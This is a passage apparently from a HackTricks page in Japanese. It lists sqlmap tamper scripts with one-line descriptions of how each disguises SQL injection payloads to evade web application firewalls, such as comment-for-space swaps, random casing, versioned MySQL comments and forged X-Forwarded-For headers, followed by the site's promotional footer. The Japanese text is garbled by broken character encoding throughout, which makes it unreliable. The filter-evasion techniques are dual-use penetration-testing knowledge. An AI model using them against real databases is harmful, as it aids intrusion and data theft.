| modsecurityzeroversioned.py | ãŒãããŒãžã§ã³ã®ã³ã¡ã³ãã§ã¯ãšãªå šäœãå²ã¿ãŸã |
| multiplespaces.py | SQLããŒã¯ãŒãã®åšãã«è€æ°ã®ã¹ããŒã¹ãè¿œå ããŸã |
| nonrecursivereplacement.py | äºåå®çŸ©ãããSQLããŒã¯ãŒãã眮æã«é©ããè¡šçŸã«çœ®ãæããŸãïŒäŸïŒ.replace("SELECT", ""))ãã£ã«ã¿ãŒ |
| percentage.py | åæåã®åã«ããŒã»ã³ãèšå· '%' ãè¿œå ããŸã |
| overlongutf8.py | æå®ããããã€ããŒãå ã®ãã¹ãŠã®æåãå€æããŸãïŒãã§ã«ãšã³ã³ãŒããããŠãããã®ã¯åŠçããŸããïŒ |
| randomcase.py | åããŒã¯ãŒãæåãã©ã³ãã ãªå€§æå/å°æåã®å€ã«çœ®ãæããŸã |
| randomcomments.py | SQLããŒã¯ãŒãã«ã©ã³ãã ãªã³ã¡ã³ããè¿œå ããŸã |
| securesphere.py | ç¹å¥ã«äœæãããæååãè¿œå ããŸã |
| sp_password.py | ãã€ããŒãã®æ«å°Ÿã« 'sp_password' ãè¿œå ããŠãDBMSãã°ããã®èªåçãªææ§åãè¡ããŸã |
| space2comment.py | ã¹ããŒã¹æå ' ' ãã³ã¡ã³ãã«çœ®ãæããŸã |
| space2dash.py | ã¹ããŒã¹æå ' ' ãããã·ã¥ã³ã¡ã³ã '--' ã«çœ®ãæãããã®åŸã«ã©ã³ãã ãªæååãšæ¹è¡ '\n' ãè¿œå ããŸã |
| space2hash.py | ã¹ããŒã¹æå ' ' ãããŠã³ãæå '\#' ã«çœ®ãæãããã®åŸã«ã©ã³ãã ãªæååãšæ¹è¡ '\n' ãè¿œå ããŸã |
| space2morehash.py | ã¹ããŒã¹æå ' ' ãããŠã³ãæå '\#' ã«çœ®ãæãããã®åŸã«ã©ã³ãã ãªæååãšæ¹è¡ '\n' ãè¿œå ããŸã |
| space2mssqlblank.py | ã¹ããŒã¹æå ' ' ãæå¹ãªä»£æ¿æåã®ã»ããããã®ã©ã³ãã ãªç©ºçœæåã«çœ®ãæããŸã |
| space2mssqlhash.py | ã¹ããŒã¹æå ' ' ãããŠã³ãæå '\#' ã«çœ®ãæããæ¹è¡ '\n' ãè¿œå ããŸã |
| space2mysqlblank.py | ã¹ããŒã¹æå ' ' ãæå¹ãªä»£æ¿æåã®ã»ããããã®ã©ã³ãã ãªç©ºçœæåã«çœ®ãæããŸã |
| space2mysqldash.py | ã¹ããŒã¹æå ' ' ãããã·ã¥ã³ã¡ã³ã '--' ã«çœ®ãæããæ¹è¡ '\n' ãè¿œå ããŸã |
| space2plus.py | ã¹ããŒã¹æå ' ' ããã©ã¹ '+' ã«çœ®ãæããŸã |
| space2randomblank.py | ã¹ããŒã¹æå ' ' ãæå¹ãªä»£æ¿æåã®ã»ããããã®ã©ã³ãã ãªç©ºçœæåã«çœ®ãæããŸã |
| symboliclogical.py | ANDããã³ORè«çæŒç®åãããããã®ã·ã³ãã«ã«çœ®ãæããŸã (&& ããã³ |
| unionalltounion.py | UNION ALL SELECT ã UNION SELECT ã«çœ®ãæããŸã |
| unmagicquotes.py | ã¯ã©ãŒãæå ' ããã«ããã€ãã³ã³ã %bf%27 ãšäžç·ã«ãžã§ããªãã¯ã³ã¡ã³ãã§çœ®ãæããŸãïŒåäœãããããã«æåŸã«ïŒ |
| uppercase.py | åããŒã¯ãŒãæåã倧æåã«çœ®ãæããŸã 'INSERT' |
| varnish.py | HTTPããã㌠'X-originating-IP' ãè¿œå ããŸã |
| versionedkeywords.py | é¢æ°ã§ãªãåããŒã¯ãŒããããŒãžã§ã³ä»ãã®MySQLã³ã¡ã³ãã§å²ã¿ãŸã |
| versionedmorekeywords.py | åããŒã¯ãŒããããŒãžã§ã³ä»ãã®MySQLã³ã¡ã³ãã§å²ã¿ãŸã |
| xforwardedfor.py | åœã®HTTPããã㌠'X-Forwarded-For' ãè¿œå ããŸã |
âïž HackTricks Cloud âïž -ðŠ Twitter ðŠ - ðïž Twitch ðïž - ð¥ Youtube ð¥
-
ãµã€ããŒã»ãã¥ãªãã£äŒæ¥ã§åããŠããŸããïŒ HackTricksã§äŒç€Ÿã宣äŒãããã§ããïŒãŸãã¯ãPEASSã®ææ°ããŒãžã§ã³ãå ¥æãããã§ããïŒãŸãã¯ãHackTricksãPDFã§ããŠã³ããŒããããã§ããïŒSUBSCRIPTION PLANSããã§ãã¯ããŠãã ããïŒ
-
The PEASS FamilyãçºèŠããŸããããç¬å çãªNFTã®ã³ã¬ã¯ã·ã§ã³ã§ãã
-
å ¬åŒã®PEASSïŒHackTricksã®ã°ããºãæã«å ¥ããŸãããã
-
ð¬ Discordã°ã«ãŒããŸãã¯[ãã¬ã°ã©ã ã°ã«ãŒã](https://t.me/